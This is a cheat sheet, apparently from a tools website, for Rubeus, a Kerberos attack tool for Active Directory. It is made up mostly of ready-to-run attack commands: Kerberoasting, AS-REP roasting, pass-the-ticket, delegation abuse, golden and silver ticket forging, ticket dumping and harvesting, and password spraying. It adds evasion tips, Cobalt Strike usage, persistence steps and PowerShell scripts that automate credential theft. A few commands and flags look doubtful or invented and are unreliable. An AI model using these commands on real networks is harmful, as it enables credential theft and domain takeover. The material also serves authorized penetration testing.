コンテンツにスキップ

Rubeus Kerberos Interaction Tool Cheat Sheet

Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It's designed for attacking Kerberos implementations and includes functionality for ticket requests, renewals, and various Kerberos-based attacks. Rubeus is particularly useful for Active Directory penetration testing and red team operations.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

Pre-compiled Binary

# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"

# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256

Compile from Source

# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/

Alternative Download Methods

# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output

# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe

Basic Usage

Command Structure

# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help

Available Commands

Command Description
asktgt Request a TGT (Ticket Granting Ticket)
asktgs Request a TGS (Ticket Granting Service)
askticket Request a ticket for a specific service
renew Renew a ticket
s4u Perform S4U (Service for User) attacks
ptt Pass-the-ticket attacks
purge Purge tickets from memory
describe Describe ticket contents
klist List current tickets
dump Dump tickets from memory
triage Triage tickets
monitor Monitor for new tickets
harvest Harvest tickets
brute Brute force passwords
kerberoast Kerberoasting attacks
asreproast AS-REP roasting attacks

Ticket Requests and Management

Request TGT (Ticket Granting Ticket)

# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com

Request TGS (Ticket Granting Service)

# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com

# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256

Ticket Management

# List current tickets
Rubeus.exe klist

# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets
Rubeus.exe purge

# Purge specific ticket
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory
Rubeus.exe dump

# Dump tickets for specific user
Rubeus.exe dump /user:username

Kerberoasting Attacks

Basic Kerberoasting

# Kerberoast all SPNs
Rubeus.exe kerberoast

# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount

# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4

# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt

Advanced Kerberoasting

# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"

# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com

# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com

# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise

Targeted Kerberoasting

# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com

# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020

# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"

AS-REP Roasting Attacks

Basic AS-REP Roasting

# AS-REP roast all users
Rubeus.exe asreproast

# AS-REP roast specific user
Rubeus.exe asreproast /user:username

# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat

Advanced AS-REP Roasting

# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com

# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com

Pass-the-Ticket (PTT) Attacks

Basic Pass-the-Ticket

# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe

Advanced PTT Techniques

# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi

# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com

# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe

S4U (Service for User) Attacks

S4U2Self Attacks

# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

S4U2Proxy Attacks

# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap

# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

Constrained Delegation Abuse

# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com

# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com

Golden and Silver Ticket Attacks

Golden Ticket Creation

# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520

Silver Ticket Creation

# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com

Ticket Harvesting and Monitoring

Ticket Harvesting

# Harvest tickets from all sessions
Rubeus.exe harvest

# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30

# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator

# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt

Ticket Monitoring

# Monitor for new tickets
Rubeus.exe monitor

# Monitor with specific interval
Rubeus.exe monitor /interval:60

# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount

# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt

Ticket Triage

# Triage all tickets
Rubeus.exe triage

# Triage tickets for specific user
Rubeus.exe triage /user:administrator

# Triage with LUID filter
Rubeus.exe triage /luid:0x12345

# Triage and show service tickets only
Rubeus.exe triage /service

Password Attacks

Password Spraying

# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket

# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket

# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket

Credential Validation

# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials

# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials

# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials

Advanced Techniques

Cross-Domain Attacks

# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com

# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket

# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

Unconstrained Delegation Abuse

# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5

# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap

# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt

Resource-Based Constrained Delegation

# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt

Evasion Techniques

OPSEC Considerations

# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256

# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000

# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com

# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com

Stealth Operations

# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0

# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024

Integration with Other Tools

Mimikatz Integration

# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi

# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi

Impacket Integration

# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com

Cobalt Strike Integration

# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump

Automation Scripts

Comprehensive Kerberos Assessment

# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Automated Ticket Harvesting

# Automated ticket harvesting script
param(
    [int]$Interval = 300,  # 5 minutes
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600  # 1 hour
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt $endTime) \\\\{
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"

    Write-Host "[+] Iteration $iteration - Harvesting tickets..."
    & Rubeus.exe harvest|Out-File $outputFile

    Write-Host "[+] Tickets saved to $outputFile"

    if ((Get-Date) -lt $endTime) \\{
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    \\}

    $iteration++
\\}

Write-Host "[+] Ticket harvesting complete"

Domain Reconnaissance Script

# Domain reconnaissance with Rubeus
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest|Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") \\{
    Write-Host "[+] Credentials valid, continuing reconnaissance..."

    # Kerberoasting with credentials
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"

    # AS-REP Roasting with credentials
    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"

    Write-Host "[+] Reconnaissance complete"
\\} else \\{
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
\\}

Troubleshooting

Common Issues

# Clock skew issues
w32tm /resync

# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88

# Kerberos configuration
klist purge
klist

# DNS resolution
nslookup _kerberos._tcp.domain.com

Debug Mode

# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1

# View Kerberos events
Get-WinEvent -LogName System|Where-Object \\{$_.Id -eq 4768 -or $_.Id -eq 4769\\}

# Check ticket cache
klist tickets

Error Resolution

# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout

# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain

# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format

# KRB_AP_ERR_SKEW
# Synchronize time with domain controller

Best Practices

Operational Security

  1. Use legitimate accounts: Avoid suspicious service accounts when possible
  2. Limit requests: Don't flood the domain controller with requests
  3. Time synchronization: Ensure proper time sync to avoid clock skew
  4. Clean up: Remove injected tickets after operations
  5. Monitor logs: Be aware of generated security events

Attack Strategy

# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist

# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats

# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin

# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com

Resources

This cheat sheet provides a comprehensive reference for using Rubeus. Always ensure you have proper authorization before conducting Active Directory security assessments.